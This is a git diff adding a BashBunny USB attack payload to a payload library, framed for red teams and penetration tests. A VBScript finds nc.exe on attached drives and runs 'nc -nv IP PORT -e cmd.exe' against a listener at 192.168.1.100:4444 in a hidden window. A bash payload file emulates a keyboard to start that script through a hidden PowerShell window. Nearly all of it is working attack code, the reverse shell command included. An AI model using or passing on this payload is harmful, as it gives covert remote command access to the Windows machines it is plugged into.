diff --git a/payloads/library/RAZ_VBScript/a.vbs b/payloads/library/RAZ_VBScript/a.vbs new file mode 100644 index 00000000..fd1a23a6 --- /dev/null +++ b/payloads/library/RAZ_VBScript/a.vbs @@ -0,0 +1,162 @@ +Option Explicit + +'============================================================================== +' Title: a.vbs +' Author: RalphyZ +' Version: 1.0 +' Target: Windows 7+ +' +' Description: +' This VBScript is used by a BashBunny payload to +' to create a netcat reverse shell. The netcat listener +' IP Address and Port are stored in separate files - so that +' Red Teams can quickly change information. The "IncrementPort" +' subroutine will increase the port number by 1 every time the +' script is called. This is so that you can start multiple +' listeners while doing a PenTest, and grab multiple reverse +' shells in one trip. Uncomment that if you want the auto-increment +' +' Note: You must put the netcat executable in the strReverseShellPath directory +'============================================================================== + +' Declare Constants +Const ForReading = 1 +Const ForWriting = 2 + +' Declare Global Variables +Dim strListenerPort, strNewListenerPort, strListenerIP +Dim objFSO, objFile, strCurrentDirectory +Dim strNetCatEXE, strReverseShellPath, strListnerPortFile, strListenerIPFile + +' The netcat executable name +strNetCatEXE = "nc.exe" + +' The folder location +strReverseShellPath = "\payloads\library\RAZ_ReverseShell\" + +' The file containing the listener port +strListnerPortFile = "listener_port.txt" + +' The file containing the listener ip address +strListenerIPFile = "listener_ip.txt" + +' Create a File System Object +Set objFSO = CreateObject("Scripting.FileSystemObject") + +strCurrentDirectory = FindCurrentDirectory() + +' Read the Host IP Address (where the listener resides) +ReadHostIP + +' Read the listener port +ReadPort + +' Increment the listener port - for multiple shells +' Great for Red Teams +'IncrementPort + +' Start NetCat Reverse Shell +StartNetCat + +'============================================================================== +' Name: FindCurrentDirectory +' Arguments: None +' Return Value: None +' Description: Find the netcat executable +'============================================================================== +Function FindCurrentDirectory + Dim objDrives, d + + ' Set default return value + FindCurrentDirectory = "" + + ' Search all drives for the netcat exe + Set objDrives = objFSO.Drives + For Each d in objDrives + If (objFSO.FileExists(d + strReverseShellPath + strNetCatEXE)) Then + FindCurrentDirectory = d + strReverseShellPath + End if + Next +End Function + +'============================================================================== +' Name: ReadHostIP +' Arguments: None +' Return Value: None +' Description: Read the listener IP +'============================================================================== +Sub ReadHostIP() + ' Opens the file for reading + Set objFile = objFSO.OpenTextFile(strCurrentDirectory + strListenerIPFile , ForReading) + + ' Read the host IP + strListenerIP = objFile.ReadAll + + ' Close the file + objFile.Close +End Sub + + +'============================================================================== +' Name: ReadPort +' Arguments: None +' Return Value: None +' Description: Read the listener port +'============================================================================== +Sub ReadPort() + ' Opens the file for reading + Set objFile = objFSO.OpenTextFile(strCurrentDirectory + strListnerPortFile , ForReading) + + ' Read the listener port + strListenerPort = objFile.ReadAll + + ' Close the file + objFile.Close +End Sub + +'============================================================================== +' Name: IncrementPort +' Arguments: None +' Return Value: None +' Description: Read the listener port, increment the counter by 1, and write +' the new value +'============================================================================== +Sub IncrementPort() + ' Increment the listener port + strNewListenerPort = strListenerPort + 1 + + ' Open the file that contains the listener port for writing + Set objFile = objFSO.OpenTextFile(strCurrentDirectory + strListnerPortFile , ForWriting) + + ' Write the new (incremented) port + objFile.WriteLine strNewListenerPort + + ' Close the file + objFile.Close +End Sub + +'============================================================================== +' Name: StartNetCat +' Arguments: None +' Return Value: None +' Description: Start netcat on the appropriate port +'============================================================================== +Sub StartNetCat() + Dim strNetCat, strCommand, objShell + + ' Build the path to the netcat executable + strNetCat = objFSO.BuildPath(strCurrentDirectory, strNetCatEXE) + + ' Create the command string to run netcat on the correct ip and port, + ' and serve cmd.exe to the listener + strCommand = strNetCat + " -nv " + strListenerIP + " " + strListenerPort + " -e cmd.exe" + + ' Create the WScript Shell object + Set objShell = WScript.CreateObject ("WScript.Shell") + + ' Run the command (' , 0'= hidden) + objShell.run strCommand, 0 + + ' Free the object from memory + Set objShell = Nothing +End Sub \ No newline at end of file diff --git a/payloads/library/RAZ_VBScript/listener_ip.txt b/payloads/library/RAZ_VBScript/listener_ip.txt new file mode 100644 index 00000000..b1c12741 --- /dev/null +++ b/payloads/library/RAZ_VBScript/listener_ip.txt @@ -0,0 +1 @@ +192.168.1.100 \ No newline at end of file diff --git a/payloads/library/RAZ_VBScript/listener_port.txt b/payloads/library/RAZ_VBScript/listener_port.txt new file mode 100644 index 00000000..1b824382 --- /dev/null +++ b/payloads/library/RAZ_VBScript/listener_port.txt @@ -0,0 +1 @@ +4444 \ No newline at end of file diff --git a/payloads/library/RAZ_VBScript/payload.txt b/payloads/library/RAZ_VBScript/payload.txt new file mode 100644 index 00000000..b395f94f --- /dev/null +++ b/payloads/library/RAZ_VBScript/payload.txt @@ -0,0 +1,35 @@ +#!/bin/bash +# +# Title: RAZ_VBScript +# Author: RalphyZ +# Version: 1.0 +# Target: Windows 7+ +# Dependencies: VBScript (a.vbs) in the switch folder with this file +# +# Description: Executes a VBScript, concealed in a hidden PowerShell window +# +# Colors: +# Green.....................Working +# White.....................Completed without error +# Light-Blue (blinking).....a.vbs was not found + +LED G +ATTACKMODE HID STORAGE + +# Get the switch position +source bunny_helpers.sh + +# Check if a.vbs is present +if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/a.vbs" ] ; then + LED B G 100 + exit 1 +fi + +# Run the VBScript +QUACK GUI r +QUACK DELAY 100 +QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\a.vbs')" +QUACK ENTER + +# Green LED for finished +LED R G B \ No newline at end of file